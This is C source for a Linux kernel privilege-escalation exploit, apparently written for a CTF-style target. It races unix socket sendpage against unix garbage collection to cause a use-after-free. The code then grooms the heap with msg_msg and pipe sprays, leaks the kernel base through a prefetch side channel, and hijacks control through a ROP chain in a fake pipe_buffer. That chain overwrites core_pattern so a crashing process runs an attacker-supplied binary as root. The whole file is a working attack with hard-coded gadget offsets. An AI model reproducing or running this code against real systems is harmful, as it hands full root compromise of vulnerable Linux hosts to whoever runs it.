#define _GNU_SOURCE
#include <sched.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/timerfd.h>
#include <time.h>
#include <unistd.h>
#include <linux/io_uring.h>
#include <unistd.h>
#include <syscall.h>
#include <sys/mman.h>
#include <err.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/prctl.h>
#include <pthread.h>
#include <poll.h>
#include <sys/epoll.h>
#include <sys/resource.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <string.h>
#include <signal.h>
#include <sys/wait.h>
#include <sys/sendfile.h>

#define SYSCHK(x) ({              \
	typeof(x) __res = (x);        \
	if (__res == (typeof(x))-1)   \
		err(1, "SYSCHK(" #x ")"); \
	__res;                        \
})
char y[2];
#define PAUSE          \
	{                  \
		printf(":");   \
		read(0, y, 1); \
	}
size_t gettime();
char buf[0x1000];
int timefds[0x1000];
int epfds[0x1000];
size_t timeout = 200;
int fds[2];
int A, B, C, D;
char data[0x1000];
int sync_job[2];
int signalpipe[2];
int datapipe[2];
int spray_pipe[0x100][2];
int spray_pipe2[0x400][2];

int tfd;
char spray_data[0x1000];
int *msqid;
int *hackq;

struct
{
	long mtype;
	char mtext[0x2000];
} msg;

#define KERNEL_LOWER_BOUND 0xffffffff80000000ull
#define KERNEL_UPPER_BOUND 0xffffffffc0000000ull

#define STEP_KERNEL 0x100000ull
#define SCAN_START_KERNEL KERNEL_LOWER_BOUND
#define SCAN_END_KERNEL KERNEL_UPPER_BOUND
#define ARR_SIZE_KERNEL (SCAN_END_KERNEL - SCAN_START_KERNEL) / STEP_KERNEL

#define PHYS_LOWER_BOUND 0xffff888000000000ull
#define PHYS_UPPER_BOUND 0xfffffe0000000000ull

#define STEP_PHYS 0x40000000ull
#define SCAN_START_PHYS PHYS_LOWER_BOUND
#define SCAN_END_PHYS PHYS_UPPER_BOUND
#define ARR_SIZE_PHYS (SCAN_END_PHYS - SCAN_START_PHYS) / STEP_PHYS

#define DUMMY_ITERATIONS 5
#define ITERATIONS 100

uint64_t kaslr;
uint64_t phys;

// https://www.willsroot.io/2022/12/entrybleed.html
uint64_t sidechannel(uint64_t addr)
{
	uint64_t a, b, c, d;
	asm volatile(".intel_syntax noprefix;"
				 "mfence;"
				 "rdtscp;"
				 "mov %0, rax;"
				 "mov %1, rdx;"
				 "xor rax, rax;"
				 "lfence;"
				 "prefetchnta qword ptr [%4];"
				 "prefetcht2 qword ptr [%4];"
				 "xor rax, rax;"
				 "lfence;"
				 "rdtscp;"
				 "mov %2, rax;"
				 "mov %3, rdx;"
				 "mfence;"
				 ".att_syntax;"
				 : "=r"(a), "=r"(b), "=r"(c), "=r"(d)
				 : "r"(addr)
				 : "rax", "rbx", "rcx", "rdx");
	a = (b << 32) | a;
	c = (d << 32) | c;
	return c - a;
}

uint64_t prefetch(int phys)
{
	uint64_t arr_size = ARR_SIZE_KERNEL;
	uint64_t scan_start = SCAN_START_KERNEL;
	uint64_t step_size = STEP_KERNEL;
	if (phys)
	{
		arr_size = ARR_SIZE_PHYS;
		scan_start = SCAN_START_PHYS;
		step_size = STEP_PHYS;
	}

	uint64_t *data = malloc(arr_size * sizeof(uint64_t));
	memset(data, 0, arr_size * sizeof(uint64_t));

	uint64_t min = ~0, addr = ~0;

	for (int i = 0; i < ITERATIONS + DUMMY_ITERATIONS; i++)
	{
		for (uint64_t idx = 0; idx < arr_size; idx++)
		{
			uint64_t test = scan_start + idx * step_size;
			syscall(104);
			uint64_t time = sidechannel(test);
			if (i >= DUMMY_ITERATIONS)
				data[idx] += time;
		}
	}

	for (int i = 0; i < arr_size; i++)
	{
		data[i] /= ITERATIONS;
		if (data[i] < min)
		{
			min = data[i];
			addr = scan_start + i * step_size;
		}
	}

	free(data);

	return addr;
}

size_t KERNEL_BASE = 0xffffffff81000000;
size_t LEAKED_KHEAP = 0xffff888140000000;

// simple most frequent value in array algorithm
size_t mostFrequent(size_t *arr, size_t n)
{
	// code here
	size_t maxcount = 0;
	size_t element_having_max_freq;
	for (int i = 0; i < n; i++)
	{
		size_t Count = 0;
		for (int j = 0; j < n; j++)
		{
			if (arr[i] == arr[j])
				Count++;
		}

		if (Count > maxcount)
		{
			maxcount = Count;
			element_having_max_freq = arr[i];
		}
	}

	return element_having_max_freq;
}
// Since there no KPTI on the remote server (as its CPU is not affected by Meltdown, so the kernel does not turn on KPTI)
// so this is actually prefetch attack. ref: https://gruss.cc/files/prefetch.pdf
void leak()
{
	size_t kbase[0x8] = {0};
	size_t kheap[0x8] = {0};
	for (int i = 0; i < 0x8; i++)
	{
		kbase[i] = prefetch(0) - 0x1600000;
		kheap[i] = prefetch(1);
		printf("0x%lx 0x%lx\n", kbase[i], kheap[i]);
	}
	KERNEL_BASE = mostFrequent(kbase, 8);
	LEAKED_KHEAP = mostFrequent(kheap, 8);
	printf("choose 0x%lx 0x%lx\n", KERNEL_BASE, LEAKED_KHEAP);
}

#define FIXED_OFFSET 0x140000000 
#define PAGE_OFFSET_BASE (LEAKED_KHEAP - FIXED_OFFSET) // physmap base of physical address 0x0
#define TARGET_PHYS_ADDR 0x82e2380 // high probability addr we found msg_msg after spray 794MB msg
#define PHYS_ADDR_MSG (PAGE_OFFSET_BASE + TARGET_PHYS_ADDR)

#define NUM_QUEUE_MAX 32000
#define NUM_QUEUE_RESV 100 // reserved for exploitation
#define NUM_QUEUE (NUM_QUEUE_MAX - NUM_QUEUE_RESV)
#define NUM_MSG 204
#define CHUNK_SIZE 0x80
#define MSG_SIZE (CHUNK_SIZE - 0x30)

// Spray as many msg_msgs as possible to full the kernel heap memory
// For 4 GB RAM system, we spray NUM_QUEUE * NUM_MSG * CHUNK_SIZE = 794 MB msg_msg
// It's enough for us to analyze and make our choose kernel address become a msg_msg.
int setup_msg()
{
	msqid = malloc(sizeof(*msqid) * 40000);
	hackq = malloc(sizeof(*msqid) * NUM_QUEUE_RESV);
	printf("setup msg start..\n");
	memset(&msg.mtext[0], 0, 0x2000);
	msg.mtype = 1;
	// Removes all of the current user's previously allocated msg_msg structs to aviod reach limits.
	system("ipcrm --all=msg");
	for (int i = 0; i < NUM_QUEUE; i++)
	{
		msqid[i] = msgget(IPC_PRIVATE, 0644 | IPC_CREAT);
		SYSCHK(msqid[i]);
	}
	for (int i = 0; i < NUM_QUEUE_RESV; i++)
	{
		hackq[i] = msgget(IPC_PRIVATE, 0644 | IPC_CREAT);
		SYSCHK(hackq[i]);
	}
	// Fake `struct skb_shared_info` in the data of msg_msg
	// We will choose a specific kernel heap address as `skb_shinfo(skb)`
	msg.mtext[0x44 - 0x30] = '\x10'; // nr_frags
	for (int j = 0; j < NUM_MSG; j++)
	{
		for (int i = 0; i < NUM_QUEUE; i++)
		{
			*(size_t *)&msg.mtext[0] = i; // queue identifier stored here
			msg.mtype = j + 1; // msg index identifier
			SYSCHK(msgsnd(msqid[i], &msg, MSG_SIZE, IPC_NOWAIT));
		}
	}
	printf("setup msg done\n");
}

#ifdef LTS
#define START_ROP 0x50
#define STATIC_KBASE 0xffffffff81000000
#define POP_RDI (KERNEL_BASE + (0xffffffff8112cfc0 - STATIC_KBASE))	 // pop rdi ; ret
#define POP_RSI (KERNEL_BASE + (0xffffffff81064c7e - STATIC_KBASE))	 // pop rsi ; ret
#define POP_RSI2 (KERNEL_BASE + (0xffffffff811ea35e - STATIC_KBASE)) // pop rsi ; mov eax, xxx ; ret
#define POP_RDX (KERNEL_BASE + (0xffffffff810bf3d2 - STATIC_KBASE))	 // pop rdx ; ret
#define POP_RSP (KERNEL_BASE + (0xffffffff81027924 - STATIC_KBASE))	 // pop rsp ; ret
#define PIVOT (KERNEL_BASE + (0xffffffff8198954b - STATIC_KBASE))	 // push rsi ; jmp qword ptr [rsi + 0x39]
#define PIVOT2 (KERNEL_BASE + (0xffffffff8112cfbe - STATIC_KBASE))	 // pop rsp ; pop r15 ; ret
#define PIVOT3 (KERNEL_BASE + (0xffffffff81c53eb4 - STATIC_KBASE))	 // push rsi ; jmp qword ptr [rsi + 0x2e]
#define CORE_PATTERN (KERNEL_BASE + (0xffffffff837ba460 - STATIC_KBASE))
#define COPY_FROM_USER (KERNEL_BASE + (0xffffffff8186e280 - STATIC_KBASE))
#define MSLEEP (KERNEL_BASE + (0xffffffff812292e0 - STATIC_KBASE))
#define ANON_PIPE_BUF_OPS_OFF (0xffffffff82a1cf80 - STATIC_KBASE)
#else
#define START_ROP 0x50
#define STATIC_KBASE 0
#define POP_RDI (KERNEL_BASE + (0x012001cc - STATIC_KBASE)) // pop rdi ; ret
#define POP_RSI (KERNEL_BASE + (0x00fd4d75 - STATIC_KBASE)) // pop rsi ; ret
#define POP_RSI2 (KERNEL_BASE + (0x00fd4d75 - STATIC_KBASE)) // pop rsi ; mov eax, xxx ; ret
#define POP_RDX (KERNEL_BASE + (0x00fc7352 - STATIC_KBASE)) // pop rdx ; ret
#define POP_RSP (KERNEL_BASE + (0x00fd3ea6 - STATIC_KBASE)) // pop rsp ; ret
#define PIVOT   (KERNEL_BASE + (0x008a9428 - STATIC_KBASE)) // push rsi ; jmp qword ptr [rsi + 0x39]
#define PIVOT2  (KERNEL_BASE + (0x0008160e - STATIC_KBASE)) // pop rsp ; pop r15 ; ret
#define PIVOT3   (KERNEL_BASE + (0 - STATIC_KBASE)) // push rsi ; jmp qword ptr [rsi + 0x2e]
#define CORE_PATTERN (KERNEL_BASE + (0x239e4a0 - STATIC_KBASE))
#define COPY_FROM_USER (KERNEL_BASE + (0x7855f0 - STATIC_KBASE))
#define MSLEEP (KERNEL_BASE + (0x16c1c0 - STATIC_KBASE))
#define ANON_PIPE_BUF_OPS_OFF (0x17cae40 - STATIC_KBASE)
#endif

char user_buf[] = "|/proc/%P/fd/666";
#define ROP(idx) ((size_t *)rop)[(idx) + (START_ROP / 8)]
int build_fake_pipe_buffer_with_rop_chain(size_t rop_addr, char *rop)
{
	*(size_t *)&rop[0x8] = POP_RDI;
	*(size_t *)&rop[0x18] = POP_RSP;
	*(size_t *)&rop[0x20] = rop_addr + START_ROP;

#ifdef LTS
	*(size_t*)&rop[0x10] = rop_addr+0x30; //set pipe_buffer.ops
	*(size_t*)&rop[0x38] = PIVOT3; //set pipe_buf_operations.release
	*(size_t*)&rop[0x2e] = PIVOT2;
#else
	*(size_t *)&rop[0x10] = rop_addr + 0x20; //set pipe_buffer.ops
	*(size_t *)&rop[0x28] = PIVOT; //set pipe_buf_operations.release
	*(size_t *)&rop[0x39] = PIVOT2;
#endif

	int i = 0;
	// copy_from_user(core_pattern, user_buf, sizeof(user_buf);
	ROP(i++) = POP_RDI;
	ROP(i++) = CORE_PATTERN;
	ROP(i++) = POP_RSI2;
	ROP(i++) = (size_t)&user_buf;
	ROP(i++) = POP_RDX;
	ROP(i++) = sizeof(user_buf);
	ROP(i++) = COPY_FROM_USER;
	// msleep(0x10000);
	ROP(i++) = POP_RDI;
	ROP(i++) = 0x10000;
	ROP(i++) = MSLEEP;
}

int corrupted_msg()
{
	int corrupted_q = 0;
	int corrupted_type = 0;
	int victim_q, victim_type = 0;
	for (int i = 0; i < NUM_QUEUE; i++)
	{
		int tmp_mtype = 0;
		for (int j = 0; j < NUM_MSG; j++)
		{
			if (msgrcv(msqid[i], &msg, MSG_SIZE, j, MSG_COPY | IPC_NOWAIT) < 0)
			{
				break;
			}
			// check if msg is corrupted
			if (msg.mtype - 1 != tmp_mtype || *(size_t *)&msg.mtext[0] != i)
			{
				corrupted_q = i; // corrupted msg queue
				corrupted_type = tmp_mtype; // corrupted msg index/type identifier
				victim_q = *(size_t *)&msg.mtext[0]; // victim msg queue
				victim_type = msg.mtype; // victim msg index/type identifier
				// Now we have `msqid[corrupted_q]` with mtype corrupted_type point the same msg
				// at msqid[victim_q] with mtype `victim_type`
				goto done;
			}
			tmp_mtype = msg.mtype;
		}
	}
done:
	if (corrupted_type)
	{
		printf("corrupted_q: %d\n", corrupted_q);
		printf("corrupted_type: %d\n", corrupted_type);
		printf("victim_q: %d\n", victim_q);
		printf("victim_type: %d\n", victim_type);
		// delete msg at victim_q with mtype victim_type
		msgrcv(msqid[victim_q], &msg, MSG_SIZE, victim_type, IPC_NOWAIT); // this deleted msg can still accessed by corrupted_q with corrupted_type (msg UAF)

		// prepare corrupted msg_msg
		((size_t *)&msg.mtext[0x1000 - 0x30])[0] = 0xdead000000000122; // LIST_POISON2 (bypass list_del in the future)
		((size_t *)&msg.mtext[0x1000 - 0x30])[1] = 0x1337; // fake msg.m_type
		((size_t *)&msg.mtext[0x1000 - 0x30])[2] = 0x200; // fake msg.m_ts (for leak kernel address via buffer overread)
		((size_t *)&msg.mtext[0x1000 - 0x30])[3] = 0; // msg.next
		((size_t *)&msg.mtext[0x1000 - 0x30])[4] = 0; // msg.security

		for (int j = 0; j < NUM_QUEUE_RESV; j++)
		{
			((size_t *)&msg.mtext[0x1000 - 0x30])[5] = j;
			msg.mtype = 1;
			SYSCHK(msgsnd(hackq[j], &msg, 0x1000 - 0x30 + 0x80 - 8, 0)); // spray fake msg
			msg.mtype = 2;
			SYSCHK(msgsnd(hackq[j], &msg, 0x200, 0)); // send rop payload here later [1]
		}
		// msgrcv on corrupted msg for leaking what msg adjacent with this corrupted msg
		SYSCHK(msgrcv(msqid[corrupted_q], &msg, 0x200, corrupted_type, MSG_COPY | IPC_NOWAIT));
		int victim2_q = *(size_t *)&msg.mtext[0x80];
		int victim2_type = *(size_t *)&msg.mtext[0x60];
		printf("victim2_q: %d\n", victim2_q); // adjacent corrupted msg queue identifier
		printf("victim2_type: %d\n", victim2_type); // adjacent corrupted msg m_type identifier
		msgrcv(msqid[victim2_q], &msg, MSG_SIZE, victim2_type, IPC_NOWAIT); // free the adjacent msg
		
		// reallocate adjacent msg with another msg that contain kmalloc-1024 heap address
		for (int j = 0; j < NUM_QUEUE_RESV; j++)
		{
			msg.mtype = 3;
			*(size_t *)&msg.mtext[0] = j;
			SYSCHK(msgsnd(hackq[j], &msg, MSG_SIZE, 0)); // replace the adjacent msg
			msg.mtype = 4;
			SYSCHK(msgsnd(hackq[j], &msg, 0x400 - 0x30, 0)); // fill adjacent msg.next with kmalloc-1024
		}

		// msgrcv on corrupted msg for leaking known heap address
		// msg.prev is prepared rop memory allocated at [1]
		// msg.next is another heap memory that will be replaced with pipe_buffer later
		SYSCHK(msgrcv(msqid[corrupted_q], &msg, 0x200, corrupted_type, MSG_COPY | IPC_NOWAIT));
		size_t known_addr_pipe = *(size_t *)&msg.mtext[0x50]; // adjacent msg msg.m_prev
		size_t known_addr_rop = *(size_t *)&msg.mtext[0x58]; // adjacent msg msg.m_next
		int victim3_q = *(size_t *)&msg.mtext[0x80]; // get msg queue identifier from adjacent msg
		int victim4_q = *(size_t *)&msg.mtext[0x0]; // get msg queue identifier from msg
		printf("known_addr_rop 0x%lx\n", known_addr_rop); // rop payload address
		printf("known_addr_pipe 0x%lx\n", known_addr_pipe); // pipe_buffer address 
		printf("victim3_q: %d\n", victim3_q); 
		printf("victim4_q: %d\n", victim4_q);
		// delete msg that will replaced with pipe_buffer
		SYSCHK(msgrcv(hackq[victim3_q], &msg, 0x400 - 0x30, 4, IPC_NOWAIT));
		// replace the deleted msg with pipe_buffer
		for (int i = 0; i < 0xf0; i++)
		{
			//printf("%p\n",i);
			SYSCHK(pipe(spray_pipe2[i]));
			SYSCHK(write(spray_pipe2[i][1], "pwn", 3));
		}

		// delete the msg (that used to build fake msg)
		SYSCHK(msgrcv(hackq[victim4_q], &msg, 0x1000 - 0x30 + 0x80 - 8, 1, IPC_NOWAIT));

		// prepare for the second fake msg
		((size_t *)&msg.mtext[0x1000 - 0x30])[0] = 0xdead000000000122; // LIST_POISON2 (bypass list_del in the future)
		((size_t *)&msg.mtext[0x1000 - 0x30])[1] = 0x1337; // fake msg.m_type
		((size_t *)&msg.mtext[0x1000 - 0x30])[2] = 0x1000 - 0x30 + 0x400 - 0x8; // fake msg.m_ts
		((size_t *)&msg.mtext[0x1000 - 0x30])[3] = known_addr_pipe - 0x10; // fake msg.next for leak anon_pipe_buf_ops

		for (int j = 0; j < NUM_QUEUE_RESV; j++)
		{
			((size_t *)&msg.mtext[0x1000 - 0x30])[5] = j;
			msg.mtype = 5;
			SYSCHK(msgsnd(hackq[j], &msg, 0x1000 - 0x30 + 0x80 - 8, 0)); // spray fake msg
		}

		// receive corrupted msg
		SYSCHK(msgrcv(msqid[corrupted_q], &msg, 0x1000 - 0x30 + 0x400 - 0x8, corrupted_type, MSG_COPY | IPC_NOWAIT));
		int victim5_q = *(size_t *)&msg.mtext[0x0]; // msg queue identifier
		printf("victim5_q: %d\n", victim5_q);
		size_t anon_pipe_buf = *(size_t *)&msg.mtext[0x1000 - 0x30 + 0x20 - 8]; // anon_pipe_buf_ops address
		printf("anon_pipe_buf 0x%lx\n", anon_pipe_buf);
		KERNEL_BASE = anon_pipe_buf - ANON_PIPE_BUF_OPS_OFF; // leak kernel base
		printf("fixing kernel base to 0x%lx\n", KERNEL_BASE);

		// delete the corrupted msg that contain fake msg data for rebuild another fake msg
		SYSCHK(msgrcv(hackq[victim5_q], &msg, 0x1000 - 0x30 + 0x80 - 8, 5, IPC_NOWAIT));

		// rebuild fake msg
		((size_t *)&msg.mtext[0x1000 - 0x30])[0] = 0xdead000000000122; // LIST_POISION2
		((size_t *)&msg.mtext[0x1000 - 0x30])[1] = 0x1337; // fake msg.m_type
		((size_t *)&msg.mtext[0x1000 - 0x30])[2] = MSG_SIZE; // fake msg.m_ts
		((size_t *)&msg.mtext[0x1000 - 0x30])[3] = 0; // msg.next
		((size_t *)&msg.mtext[0x1000 - 0x30])[4] = known_addr_pipe; // fake msg.security (for arbitrary free on pipe_buffer)

		for (int j = 0; j < NUM_QUEUE_RESV; j++)
		{
			((size_t *)&msg.mtext[0x1000 - 0x30])[5] = j;
			msg.mtype = 1;
			SYSCHK(msgsnd(hackq[j], &msg, 0x1000 - 0x30 + 0x80 - 8, 0)); // overwrite stale msg with fake msg
		}

		// free up the msg quota
		for (int j = 0; j < NUM_QUEUE_RESV; j++)
		{
			if (j != victim5_q) // make sure we didn't mess up with the corrupted queue
				SYSCHK(msgrcv(hackq[j], &msg, 0x1000 - 0x30 + 0x80 - 8, 5, IPC_NOWAIT));
		}

		// delete the fake msg, this will perform arbitrary free on pipe_buffer
		SYSCHK(msgrcv(msqid[corrupted_q], &msg, MSG_SIZE, 0x1337, IPC_NOWAIT));

		// prepare fake pipe_buffer and rop payload
		msg.mtype = 6;
		build_fake_pipe_buffer_with_rop_chain(known_addr_pipe, &msg.mtext[0x1000 - 0x30 - 8]);
		for (int j = 0; j < NUM_QUEUE_RESV; j++)
		{
			// overwrite pipe_buffer
			SYSCHK(msgsnd(hackq[j], &msg, 0x1000 - 0x30 + 0x400 - 8, IPC_NOWAIT));
		}

		// trigger RIP control
		for (int i = 0; i < 0xf0; i++)
		{
			close(spray_pipe2[i][0]);
			close(spray_pipe2[i][1]);
		}

		return 1;
	}
	return 0;
}

void set_cpu(int i);

void *trigger_unix_stream_sendpage(void *x)
{
	set_cpu(0);
	// setup a certain timeout nanosecond
	struct itimerspec new = {.it_value.tv_nsec = timeout};
	// Send signal to trigger_unix_gc_thread
	write(sync_job[1], "H", 1);
	SYSCHK(timerfd_settime(tfd, TFD_TIMER_CANCEL_ON_SET, &new, NULL));
	splice(datapipe[0], 0, A, 0, 0x1000, 0);
	close(datapipe[0]);
	return NULL;
}

void *trigger_unix_gc_thread(void *x)
{
	set_cpu(1);
	int s = socket(AF_UNIX, SOCK_STREAM, 0);
	read(sync_job[0], &x, 1);
	// Release a unix socket will trigger unix_gc
	close(s);
	return NULL;
}

void *spray_pipe_page_thread(void *x)
{
	set_cpu(1);
	// After unix_gc clean skb, this thread will wakeup and start spray pipe page.
	read(signalpipe[0], buf, 1);
	for (int i = 0; i < 0x100; i++)
		for (int j = 0; j < 0x10; j++)
			write(spray_pipe[i][1], spray_data, 0x1000);

	return NULL;
}

static void epoll_ctl_add(int epfd, int fd, uint32_t events)
{
	struct epoll_event ev;
	ev.events = events;
	ev.data.fd = fd;
	SYSCHK(epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &ev));
}

void set_cpu(int i)
{
	cpu_set_t mask;
	CPU_ZERO(&mask);
	CPU_SET(i, &mask);
	sched_setaffinity(0, sizeof(mask), &mask);
}

void do_epoll_enqueue(int fd)
{
	int cfd[2];
	socketpair(AF_UNIX, SOCK_STREAM, 0, cfd);
	for (int k = 0; k < 0x4; k++)
	{
		if (fork() == 0)
		{
			for (int i = 0; i < 0x100; i++)
			{
				timefds[i] = SYSCHK(dup(fd));
			}
			for (int i = 0; i < 0xc0; i++)
			{
				epfds[i] = SYSCHK(epoll_create(0x1));
			}
			for (int i = 0; i < 0xc0; i++)
			{
				for (int j = 0; j < 0x100; j++)
				{
					// queue as many as possible async waiters at timerfd waitqueue
					epoll_ctl_add(epfds[i], timefds[j], 0);
				}
			}
			write(cfd[1], buf, 1);
			raise(SIGSTOP); // stop here for nothing and just keep epoll alive
		}
		// sync to make sure it has queue what we need
		read(cfd[0], buf, 1);
	}
	close(cfd[0]);
	close(cfd[1]);
}

int check_core()
{
	// Check if /proc/sys/kernel/core_pattern has been overwritten
	char buf[0x100] = {};
	int core = open("/proc/sys/kernel/core_pattern", O_RDONLY);
	read(core, buf, sizeof(buf));
	close(core);
	return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0;
}

void crash(char *cmd)
{
	int memfd = memfd_create("", 0);
	SYSCHK(sendfile(memfd, open("root", 0), 0, 0xffffffff));
	dup2(memfd, 666);
	close(memfd);
	while (check_core() == 0)
		sleep(1);
	*(size_t *)0 = 0;
}

int main(int argc, char **argv)
{
	size_t start_time = time(NULL);
	setvbuf(stdout, 0, 2, 0);
	//leak();
	printf("POP_RDI @ 0x%lx\n", POP_RDI);
	printf("POP_RDX @ 0x%lx\n", POP_RDX);
	printf("POP_RSI @ 0x%lx\n", POP_RSI);
	printf("POP_RSP @ 0x%lx\n", POP_RSP);
	printf("POP_RSI2 @ 0x%lx\n", POP_RSI2);
	printf("PIVOT @ 0x%lx\n", PIVOT);
	printf("PIVOT2 @ 0x%lx\n", PIVOT2);
	printf("PIVOT3 @ 0x%lx\n", PIVOT3);
	signal(SIGPIPE, SIG_IGN);

	if (fork() == 0)
	{
		set_cpu(1);
		strcpy(argv[0], "billy");
		while (1)
			sleep(1);
	}
	if (fork() == 0)
	{
		set_cpu(1);
		setsid();
		crash("");
	}

	struct rlimit rlim = {
		.rlim_cur = 0xf000,
		.rlim_max = 0xf000};
	setrlimit(RLIMIT_NOFILE, &rlim);
	// init a timerfd for extend the race windows
	tfd = timerfd_create(CLOCK_MONOTONIC, 0);
	// Do extend race windows stuff
	do_epoll_enqueue(tfd);
	pipe(sync_job);
	setup_msg();
	printf("setup head to 0x%lx\n", PHYS_ADDR_MSG);	
	// Prepare spray data for reallocate freed skb as pipe page data.
	// Craft skb->head and skb->end to control skb_shinfo pointer
	for (int i = 0; i < 0x10; i++)
	{
		*(size_t *)&spray_data[i * 0x100 + 0xc0] = PHYS_ADDR_MSG; // skb->head
		*(int *)&spray_data[i * 0x100 + 0xbc] = 0x42;		  // skb->end
	}

	for (int i = 0; i < 0x100; i++)
		SYSCHK(pipe(spray_pipe[i]));

	// prepare a template msg for send unix socket to peer
	struct msghdr msg = {};
	struct iovec iov[] = {{.iov_base = data, .iov_len = 5}};
	msg.msg_iov = iov;
	msg.msg_iovlen = 1;
	struct cmsghdr *cmsg;
	int len = CMSG_LEN(sizeof(int));
	cmsg = (struct cmsghdr *)calloc(0x10, len); // prepare larger enough chunck
	cmsg->cmsg_len = len;
	cmsg->cmsg_level = SOL_SOCKET;
	cmsg->cmsg_type = SCM_RIGHTS;
	msg.msg_control = cmsg;
	msg.msg_controllen = len;
	set_cpu(1);

	if (fork() == 0)
	{
		while (1)
		{
			// Try every different timeout seconds for timerfd to expire.
			// Hope it will hit our ideal scenario in thousands of tries
			if ((timeout & 0xff) == 0)
			{
				printf("0x%lx\n", timeout);
				// We check msg_msg->m_list->next is modified due to our UAF write every 0x100 tries
				if (corrupted_msg())
					break;
			}
			// rollback to smallest timeout to make timeout always in short time.
			if ((timeout & 0xfff) == 0)
			{
				timeout = 200;
				if( (time(NULL)-start_time)>(30*60) )
					exit(-1);
			}
			timeout++;

			// prepare a signal like pipe and make spray_pipe_page_thread read on it
			// When peer pipe has be closed by unix_gc, spray_pipe_page_thread will wake up and start spray
			pipe(signalpipe);
			pthread_t spray_thread;
			pthread_create(&spray_thread, 0, spray_pipe_page_thread, 0);

			// prepare a data pipe for us to call unix_stream_sendpage only.
			pipe(datapipe);
			write(datapipe[1], data, 0x1000);

			// Prepare unix socket refcount circle
			// A <-> B
			// C <-> D
			SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, fds));
			A = fds[0];
			B = fds[1];
			SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, fds));
			C = fds[0];
			D = fds[1];

			// Max the socket send/recv buffer, because we need to spray a certain number skb
			// For heap cross cache attack
			size_t val = 0x400000;
			SYSCHK(SYSCHK(setsockopt(D, SOL_SOCKET, SO_SNDBUF, &val, 4)));
			SYSCHK(SYSCHK(setsockopt(A, SOL_SOCKET, SO_SNDBUF, &val, 4)));
			SYSCHK(SYSCHK(setsockopt(B, SOL_SOCKET, SO_RCVBUF, &val, 4)));
			SYSCHK(SYSCHK(setsockopt(C, SOL_SOCKET, SO_RCVBUF, &val, 4)));

			// Spray a lot skb a head for heap feng shui
			*(int *)CMSG_DATA(cmsg) = C;
			for (int i = 0; i < 0x100; i++)
				SYSCHK(sendmsg(D, &msg, 0));

			// Make B's recv buffer hold C, datapipe and signalpipe refcount
			cmsg->cmsg_len = CMSG_LEN(sizeof(int) * 3);
			msg.msg_controllen = cmsg->cmsg_len;
			((int *)CMSG_DATA(cmsg))[0] = signalpipe[1]; //when release this file, spray_pipe_page_thread will wake up when CPU#1 has free cpu time.
			((int *)CMSG_DATA(cmsg))[1] = datapipe[1]; // when release this file, because pipe lock is hold in splice, it will sleep and let CPU#1 to context switch
			((int *)CMSG_DATA(cmsg))[2] = C;
			SYSCHK(sendmsg(A, &msg, 0));

			// decrease unnecessary refcount
			close(signalpipe[1]);
			close(datapipe[1]);

			// Make C's recv buffer hold B refcount
			cmsg->cmsg_len = CMSG_LEN(sizeof(int));
			msg.msg_controllen = cmsg->cmsg_len;
			*(int *)CMSG_DATA(cmsg) = B;
			SYSCHK(sendmsg(D, &msg, 0));

			// Spray a lot skb at tail for heap feng shui
			*(int *)CMSG_DATA(cmsg) = C;
			for (int i = 0; i < 0x100; i++)
				SYSCHK(sendmsg(D, &msg, 0));

			// decrease unnecessary refcount
			close(B);
			close(C);

			// A real round for race
			pthread_t tid[2];
			pthread_create(&tid[1], NULL, trigger_unix_gc_thread, NULL);
			pthread_create(&tid[0], NULL, trigger_unix_stream_sendpage, NULL);
			pthread_join(tid[1], NULL);
			pthread_join(tid[0], NULL);
			pthread_join(spray_thread, NULL);

			// Release pipe page for next round
			for (int i = 0; i < 0x100; i++)
				for (int j = 0; j < 0x10; j++)
					read(spray_pipe[i][0], buf, 0x1000);

			// Cleanup for next round
			close(A);
			close(D);
			close(signalpipe[0]);
		}
		exit(0);
	}
	wait(NULL);
	// Never return after success
	while (1)
		sleep(1); 
}
